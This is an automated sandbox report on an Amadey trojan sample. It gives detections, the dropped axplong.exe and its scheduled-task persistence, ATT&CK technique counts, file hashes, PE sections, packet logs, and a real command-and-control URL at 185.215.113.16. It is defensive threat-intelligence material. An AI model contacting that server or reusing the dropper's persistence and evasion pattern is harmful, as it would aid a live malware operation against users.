Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	53%	ReversingLabs	Win32.Packed.Themida
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	53%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://185.215.113.16/Jo89Ku7d/index.php(	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpg	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpi	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpU	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php&	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpd	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpHost185.215.113.16	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpc	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpT	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpS	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php	100%	Avira URL Cloud	malware
http://185.215.113.16/Jo89Ku7d/index.phpJ	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpB	100%	Avira URL Cloud	phishing
http://185.215.113.16/	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpE	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpncoded9	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpz	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php9	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpfer-Encoding:	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpx	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpv	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phphp	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php0	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.phpHost185.215.113.16	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpi	axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php(	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpg	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php&	axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpd	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpc	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpU	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpT	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpS	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/	axplong.exe, 00000001.00000002.4188372534.0000000001701000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpJ	axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded9	axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpE	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpC	axplong.exe, 00000001.00000002.4188372534.0000000001750000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpB	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpz	axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php9	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpx	axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpfer-Encoding:	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpv	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phphp	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpu	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpt	axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.php0	axplong.exe, 00000001.00000002.4188372534.0000000001728000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519770
Start date and time:	2024-09-27 00:19:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/3@0/1
EGA Information:	Successful, ratio: 14.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 3260 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 5164 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 5664 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 6456 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 7024 because there are no executed function
Execution Graph export aborted for target file.exe, PID 6636 because it is empty
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
18:20:11	API Interceptor	12995233x Sleep call for process: axplong.exe modified
23:20:07	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, DarkTortilla	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Go Injector, XWorm	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	185.215.113.16/Jo89Ku7d/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, DarkTortilla	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1877504
Entropy (8bit):	7.949581559827292
Encrypted:	false
SSDEEP:	49152:LYoM6Ak0hP5ohUlCRoQs7kqBZNdRyp0PZTJf:LG6AJcZR5sYaY0PP
MD5:	D47F5061136CBB1FC4D56BC8E0355C12
SHA1:	3829E4804C1E0DCD77DC82CAD9490BFAA3258887
SHA-256:	B3CAE12B1399883B64871DFB422899F804FB2AE2FCFE073FE783165295B4886D
SHA-512:	BA14BE86E71CE577C5E6106208FFB9A58E509EE8A67E94AA6646A93D5BF2691431BA886D28A8DE7711005BB144FACE91A52B2936A749A5DE6D539C64655504BF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................`J...........@...........................J..........@.................................W...k............................GJ..............................GJ..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...mjqourvh......0.....................@...duhvzjsi.....PJ......~..............@....taggant.0...`J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	3.4021736223841876
Encrypted:	false
SSDEEP:	6:9IgbXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lbAt0:9IgrpRKQ1lOmeeDHjzvYRQVEt0
MD5:	268918A72B6A784587B36C90D2BC7AD6
SHA1:	469979EA26FBA00DCEB82776344720F3517023E0
SHA-256:	C803DBD9122A69130FB25665B4CF0EE2751B04CE399A6BB5971BE18594B55842
SHA-512:	98AAAA0796E5F1E878983244A5CEE932687B5ACB7E272D84246E53360697E87A68CF24ECF9024D7D361EB3F9A3493DB27FBCFE9BCD20E97D5A73BB2B9E860337
Malicious:	false
Reputation:	low
Preview:	....c- '...B...T...4F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949581559827292
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'877'504 bytes
MD5:	d47f5061136cbb1fc4d56bc8e0355c12
SHA1:	3829e4804c1e0dcd77dc82cad9490bfaa3258887
SHA256:	b3cae12b1399883b64871dfb422899f804fb2ae2fcfe073fe783165295b4886d
SHA512:	ba14be86e71ce577c5e6106208ffb9a58e509ee8a67e94aa6646a93d5bf2691431ba886d28a8de7711005bb144face91a52b2936a749a5de6d539c64655504bf
SSDEEP:	49152:LYoM6Ak0hP5ohUlCRoQs7kqBZNdRyp0PZTJf:LG6AJcZR5sYaY0PP
TLSH:	2F9533369E57A4BFDEBCC8F0DA5AE97CAF8857B8066258C53D0B02618F537A13431D24
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8a6000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FA954CDA24Ah
je 00007FA954CDA262h
add byte ptr [eax], al
jmp 00007FA954CDC245h
add byte ptr [ecx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add eax, 0200000Ah
or al, byte ptr [eax]
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a47ec	0x10	mjqourvh
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4a479c	0x18	mjqourvh
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	6b30833fcf8651afb9967b20aa4fd0d9	False	0.9975253320844687	data	7.985952425600344	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	7934c59a5b9f61b07e810f539221b677	False	0.576171875	data	4.493352331198554	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a1000	0x200	dde49e738f5a15ed32d1b9626a8df9f8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mjqourvh	0x30c000	0x199000	0x198a00	082d670a723285579ddac46fe5f0fa51	False	0.9946221847277454	data	7.954053872063057	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
duhvzjsi	0x4a5000	0x1000	0x600	a844e74f0298c16a74f0061267ce68cc	False	0.5950520833333334	data	5.105174539000652	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4a6000	0x3000	0x2200	93c401f57e055dabb7d0138b8a8f89ec	False	0.09443933823529412	DOS executable (COM)	0.9989666142277631	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4a47fc	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T00:20:21.856173+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49740	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 00:20:12.228024960 CEST	49730	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:12.232947111 CEST	80	49730	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:12.233066082 CEST	49730	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:12.233195066 CEST	49730	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:12.238182068 CEST	80	49730	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:12.940140009 CEST	80	49730	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:12.940202951 CEST	49730	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:13.022727966 CEST	49730	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:13.029748917 CEST	80	49730	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:13.256257057 CEST	80	49730	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:13.256354094 CEST	49730	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:13.367221117 CEST	49730	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:13.367543936 CEST	49731	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:13.373876095 CEST	80	49731	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:13.373949051 CEST	49731	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:13.374079943 CEST	49731	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:13.375161886 CEST	80	49730	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:13.375212908 CEST	49730	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:13.380259037 CEST	80	49731	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:14.090639114 CEST	80	49731	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:14.090796947 CEST	49731	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:14.091665983 CEST	49731	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:14.099673986 CEST	80	49731	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:14.354705095 CEST	80	49731	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:14.354815006 CEST	49731	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:14.459220886 CEST	49731	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:14.459592104 CEST	49732	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:14.465712070 CEST	80	49731	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:14.465805054 CEST	49731	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:14.465866089 CEST	80	49732	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:14.465941906 CEST	49732	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:14.466130972 CEST	49732	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:14.472579956 CEST	80	49732	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:15.243591070 CEST	80	49732	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:15.243726969 CEST	49732	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:15.244508028 CEST	49732	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:15.249372959 CEST	80	49732	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:15.468004942 CEST	80	49732	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:15.468105078 CEST	49732	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:15.615303040 CEST	49732	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:15.615602970 CEST	49733	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:15.621308088 CEST	80	49733	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:15.621381998 CEST	49733	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:15.621543884 CEST	49733	80	192.168.2.4	185.215.113.16
